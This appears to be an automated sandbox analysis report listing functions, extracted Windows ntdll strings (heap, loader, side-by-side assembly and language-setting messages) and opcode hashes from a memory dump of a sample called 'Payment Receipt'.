                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1325123933
                                                                      • Opcode ID: 0afe9b799a9fe5c3dd8c2643f8ac853b2ce2d01ee351ac466084412331eda13b
                                                                      • Instruction ID: 2f89c203d584975fee54ed173af43c44b7d889a95c3b35baa04fda7b7c0f84c0
                                                                      • Opcode Fuzzy Hash: 0afe9b799a9fe5c3dd8c2643f8ac853b2ce2d01ee351ac466084412331eda13b
                                                                      • Instruction Fuzzy Hash: E47249719083429BD765DF28C844BABBBE9BFC9704F44492EFA85D7250EB30D905CB92
                                                                      Function 015D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • corrupted critical section, xrefs: 016154C2
                                                                      • Critical section address, xrefs: 01615425, 016154BC, 01615534
                                                                      • Address of the debug info found in the active list., xrefs: 016154AE, 016154FA
                                                                      • Critical section address., xrefs: 01615502
                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01615543
                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016154E2
                                                                      • double initialized or corrupted critical section, xrefs: 01615508
                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016154CE
                                                                      • 8, xrefs: 016152E3
                                                                      • Critical section debug info address, xrefs: 0161541F, 0161552E
                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0161540A, 01615496, 01615519
                                                                      • undeleted critical section in freed memory, xrefs: 0161542B
                                                                      • Thread identifier, xrefs: 0161553A
                                                                      • Invalid debug info address of this critical section, xrefs: 016154B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                      • API String ID: 0-2368682639
                                                                      • Opcode ID: 6018b1d25151b7ad2655095ecce6a11baab3cc0a0c07e671c778807a3530f4fa
                                                                      • Instruction ID: 985bedd9f52f0cc5a887934489c888c49bb6a41c086734a0f411b6d1cbcfd4ee
                                                                      • Opcode Fuzzy Hash: 6018b1d25151b7ad2655095ecce6a11baab3cc0a0c07e671c778807a3530f4fa
                                                                      • Instruction Fuzzy Hash: F181BBB1A40349AFDB20CF99CC45BAEBBB9FB89714F144119F505BB290D3B1A941CBA0
                                                                      Function 015D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01612602
                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01612409
                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016122E4
                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01612498
                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01612412
                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01612506
                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016124C0
                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0161261F
                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01612624
                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016125EB
                                                                      • @, xrefs: 0161259B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                      • API String ID: 0-4009184096
                                                                      • Opcode ID: 1c2666d32e3e9e1db2c81e95812008e9dd5609ba8952fb054d279ed9ed715521
                                                                      • Instruction ID: 47a9b01a5c3cca8b5d58c993b1bb899b1b5b1a0d90e990f0a9b3828cfabc820d
                                                                      • Opcode Fuzzy Hash: 1c2666d32e3e9e1db2c81e95812008e9dd5609ba8952fb054d279ed9ed715521
                                                                      • Instruction Fuzzy Hash: 370280B1D002299FDB31DB58CC80BDAB7B8BF54704F1445DAE609AB251EB709E84CF99
                                                                      Function 015D0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                      • API String ID: 0-360209818
                                                                      • Opcode ID: b951c7ecf5005d61c3e35ca471c09760e7fbac0211e582b9b0293908354d940a
                                                                      • Instruction ID: 0e6582de0710439107e2ae8a51d28a458f66064a741224b3d8aeb7962c9e4f3c
                                                                      • Opcode Fuzzy Hash: b951c7ecf5005d61c3e35ca471c09760e7fbac0211e582b9b0293908354d940a
                                                                      • Instruction Fuzzy Hash: F36290B5A012298FDB34DF28CC807A9B7B6BF96310F5981DAD649AB344D7325AD1CF40
                                                                      Function 01648B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                      • API String ID: 0-2515994595
                                                                      • Opcode ID: d153f2483a17a54487fd3f27d46ab0b460fa7290676298d6218de4b2db4b17f6
                                                                      • Instruction ID: 56708fa1dc6bf703efdb967a54f14550c43050184bb61aaff49820cbf72f722c
                                                                      • Opcode Fuzzy Hash: d153f2483a17a54487fd3f27d46ab0b460fa7290676298d6218de4b2db4b17f6
                                                                      • Instruction Fuzzy Hash: 1551CE725053029BC729DF58EC49BABBBECFF98240F14492DE999CB241E770D604CB92
                                                                      Function 016512ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                      • API String ID: 0-3591852110
                                                                      • Opcode ID: fbc8a5196e1fc41081fe151c465aa21c51e0916db5943da374691909131a0dac
                                                                      • Instruction ID: f6a29aecddc57613a3c08219d6e5d362e8de83e3b564c8abdc355286058f7926
                                                                      • Opcode Fuzzy Hash: fbc8a5196e1fc41081fe151c465aa21c51e0916db5943da374691909131a0dac
                                                                      • Instruction Fuzzy Hash: B312BE70600646DFEB65CF29C895BBABBF1FF0A714F188459E8868B742D734E881CB51
                                                                      Function 015BAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                      • API String ID: 0-3197712848
                                                                      • Opcode ID: 894da3106542b1b54951da097101a7ce884557e39e65747ea876185ddeaee98e
                                                                      • Instruction ID: 643203b9d37cd4c6c4069b32c428aebbba7fc617dff9bc392d141e9e9aff582e
                                                                      • Opcode Fuzzy Hash: 894da3106542b1b54951da097101a7ce884557e39e65747ea876185ddeaee98e
                                                                      • Instruction Fuzzy Hash: B612DD71A083468FD725DF28C880BEAB7E9BF84704F04491EF9959F291E774D944CBA2
                                                                      Function 0159D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                      • API String ID: 0-3532704233
                                                                      • Opcode ID: f894c92096b63833fe7d1a922bb0b7245d4a3bc40f73fefb867f91a170bd748b
                                                                      • Instruction ID: abd37cafa2d6bceea6cd7acd37df8375c954724f81691b0a08fa8bb031f3f9f5
                                                                      • Opcode Fuzzy Hash: f894c92096b63833fe7d1a922bb0b7245d4a3bc40f73fefb867f91a170bd748b
                                                                      • Instruction Fuzzy Hash: E3B17C719083569FDB25DF68C480A6FBBF8BB88754F01492EFA89DB200D774D9448B93
                                                                      Function 01650CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                      • API String ID: 0-1357697941
                                                                      • Opcode ID: d16aa739550be98f3e9185daae9d1fee264e8474ba5b10476647bce39c18bdf3
                                                                      • Instruction ID: fd91b92fde96642fa353347f9a84cea8b76f5edd89bd07a8e7f2c80d197b3456
                                                                      • Opcode Fuzzy Hash: d16aa739550be98f3e9185daae9d1fee264e8474ba5b10476647bce39c18bdf3
                                                                      • Instruction Fuzzy Hash: 85F11231A10286EFDF65CF68C881BAABBF5FF0A714F088059ED819B252D734E945CB51
                                                                      Function 01650274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                      • API String ID: 0-1700792311
                                                                      • Opcode ID: 9c60ca51f4a1cf82f923e619a4b0838a40d9131111fdc2a918567021cc07b33c
                                                                      • Instruction ID: b3b96be5dcf87c3223eb52e312e8296c5b30a593901a338dc67e237d6c1d6599
                                                                      • Opcode Fuzzy Hash: 9c60ca51f4a1cf82f923e619a4b0838a40d9131111fdc2a918567021cc07b33c
                                                                      • Instruction Fuzzy Hash: 9CD1DB35610686DFDB62DF68D841AAEBBF1FF8A714F088049F8459B362C734D981CB15
                                                                      Function 016289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • VerifierFlags, xrefs: 01628C50
                                                                      • VerifierDebug, xrefs: 01628CA5
                                                                      • VerifierDlls, xrefs: 01628CBD
                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01628A67
                                                                      • HandleTraces, xrefs: 01628C8F
                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01628A3D
                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01628B8F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                      • API String ID: 0-3223716464
                                                                      • Opcode ID: c92388d5f41a5520ac22d52e4ba9b4da1290933fb92755d295548da78e08ba0a
                                                                      • Instruction ID: ab2dd7338ba6b28372543c29a27f83e49e304a4aeab05f28515caeb665b7bb7f
                                                                      • Opcode Fuzzy Hash: c92388d5f41a5520ac22d52e4ba9b4da1290933fb92755d295548da78e08ba0a
                                                                      • Instruction Fuzzy Hash: CC910472605B229FE722EF68CC80B6A77ECBB94B14F05489DFA416F240C7309815CF95
                                                                      Function 015AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                      • API String ID: 0-1109411897
                                                                      • Opcode ID: 4f0a5bef1040519e11cf3df22c6114d3d3def4191cd5b3bebe7d03ae2452e536
                                                                      • Instruction ID: 46a51fc584e855eae9411eab9a4e6a3d461bf2a2f32b04e367fe42104f6eb9f3
                                                                      • Opcode Fuzzy Hash: 4f0a5bef1040519e11cf3df22c6114d3d3def4191cd5b3bebe7d03ae2452e536
                                                                      • Instruction Fuzzy Hash: 9FA22970A4562A8BDB79DF18CC987AEBBB5FF45304F5442DAD509AB290DB309E81CF40
                                                                      Function 0159F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-523794902
                                                                      • Opcode ID: 00c590696a5918635de4983c3a334a1e51452d2ac926e8a7624dd88e5d399d6d
                                                                      • Instruction ID: f95966aa9e1b3222c67237fc2c30d25b02c75e18c6732bb59c5953e3de37899a
                                                                      • Opcode Fuzzy Hash: 00c590696a5918635de4983c3a334a1e51452d2ac926e8a7624dd88e5d399d6d
                                                                      • Instruction Fuzzy Hash: 9942CD312083829FDB15DF28C884B6ABBE5FF88604F18496EE596CF352D734E945CB52
                                                                      Function 015AADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                      • API String ID: 0-4098886588
                                                                      • Opcode ID: 16553e1e969bd6b401f50fcf926ff85a8482825498f60a94985def8540d3abf6
                                                                      • Instruction ID: 06fcd37667b7ba9cedbc56c4f9ed827d1248704545ae9bbf254148006bef8e91
                                                                      • Opcode Fuzzy Hash: 16553e1e969bd6b401f50fcf926ff85a8482825498f60a94985def8540d3abf6
                                                                      • Instruction Fuzzy Hash: 96329F709802698FDB26CB18CC94BEEBBB5BF45340F5441EAD949AB391D7319E81CF80
                                                                      Function 015BB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                      • API String ID: 0-122214566
                                                                      • Opcode ID: dd2f4fbeb8418c476bef157c626cb00bfbbc84c9e95fa552947482ab3aa13c68
                                                                      • Instruction ID: 540ca1abd7da0fc9aea6e078d8c5442da0bd86e2036fab8e5b64bbca02051752
                                                                      • Opcode Fuzzy Hash: dd2f4fbeb8418c476bef157c626cb00bfbbc84c9e95fa552947482ab3aa13c68
                                                                      • Instruction Fuzzy Hash: 4DC1F271E012169BDB298F68CCC1BFEBBA9BF85710F184469E9029F291E7B4D944C391
                                                                      Function 015D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-792281065
                                                                      • Opcode ID: 524dfcf87bf074b174e50864e49145b4f68e57fe59ac6ce5bed6f62fb0717502
                                                                      • Instruction ID: e44b393a8f4105faa941c4cb510c3e65def4b5e68a39e4dd042da2a949d0415b
                                                                      • Opcode Fuzzy Hash: 524dfcf87bf074b174e50864e49145b4f68e57fe59ac6ce5bed6f62fb0717502
                                                                      • Instruction Fuzzy Hash: 47913871A003169BEB35DF6DDC85BAE3BA5BF40B24F18412DD9016F389DB709842CB94
                                                                      Function 0159645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 015F9A11, 015F9A3A
                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015F99ED
                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015F9A01
                                                                      • LdrpInitShimEngine, xrefs: 015F99F4, 015F9A07, 015F9A30
                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015F9A2A
                                                                      • apphelp.dll, xrefs: 01596496
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-204845295
                                                                      • Opcode ID: b548be476218a7aac5d9a77f29ab0b505ece8a65457deadae2b4c02866769da1
                                                                      • Instruction ID: cfa50910c454546ee706fa4fe1afa5d6ead70b594518d36c3c714bc1039663e2
                                                                      • Opcode Fuzzy Hash: b548be476218a7aac5d9a77f29ab0b505ece8a65457deadae2b4c02866769da1
                                                                      • Instruction Fuzzy Hash: 335180712087059FEB25DF24DC81BABBBE9FF84648F44091DF6859F260D670E948CB92
                                                                      Function 015D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01612178
                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016121BF
                                                                      • SXS: %s() passed the empty activation context, xrefs: 01612165
                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0161219F
                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01612160, 0161219A, 016121BA
                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01612180
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                      • API String ID: 0-861424205
                                                                      • Opcode ID: 3c3c8f1255436e58271d7522146e9fa3e46bafe69fafa78baeb87b3fb55577a3
                                                                      • Instruction ID: 9051285ce87ba686c1f5712cb5894ec2ec3a24ece4aa4623b17ea143850a6db6
                                                                      • Opcode Fuzzy Hash: 3c3c8f1255436e58271d7522146e9fa3e46bafe69fafa78baeb87b3fb55577a3
                                                                      • Instruction Fuzzy Hash: E9313536F002217BE731DA998C82F5A7A79FF65A40F29409DFB04BF204D7709A01CBA0
                                                                      Function 015DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 015DC6C3
                                                                      • LdrpInitializeProcess, xrefs: 015DC6C4
                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 016181E5
                                                                      • LdrpInitializeImportRedirection, xrefs: 01618177, 016181EB
                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01618170
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01618181, 016181F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                      • API String ID: 0-475462383
                                                                      • Opcode ID: 89a7e27b2a79325b5cc1df890ae97c27c93870d7c844ca99bde38adaf037ba78
                                                                      • Instruction ID: 4d2b8de06c89927004de29cc32d6d61a9f9958929a358fc6f6274c248ac02b3e
                                                                      • Opcode Fuzzy Hash: 89a7e27b2a79325b5cc1df890ae97c27c93870d7c844ca99bde38adaf037ba78
                                                                      • Instruction Fuzzy Hash: 1031CE726447529FC224EF6CDD86E2A7BE9BB94A20F04055CF945AF391E660EC04C7A2
                                                                      Function 015B9950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                      • API String ID: 0-3393094623
                                                                      • Opcode ID: 36538a3456502ee456b13a7817e731df459bec1271d3d2694a20283ba0b087b4
                                                                      • Instruction ID: 46c76e1c151f3f0af1247b7c212fb72fcf717d02ee8e65beaf8ffbd19f9f0f7d
                                                                      • Opcode Fuzzy Hash: 36538a3456502ee456b13a7817e731df459bec1271d3d2694a20283ba0b087b4
                                                                      • Instruction Fuzzy Hash: E3024CB15083928FD721CF68C4C07AFBBE5BF85708F45891EEA999B251E770D844CB92
                                                                      Function 015E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 015E2DF0: LdrInitializeThunk.NTDLL ref: 015E2DFA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0BA3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0BB6
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0D60
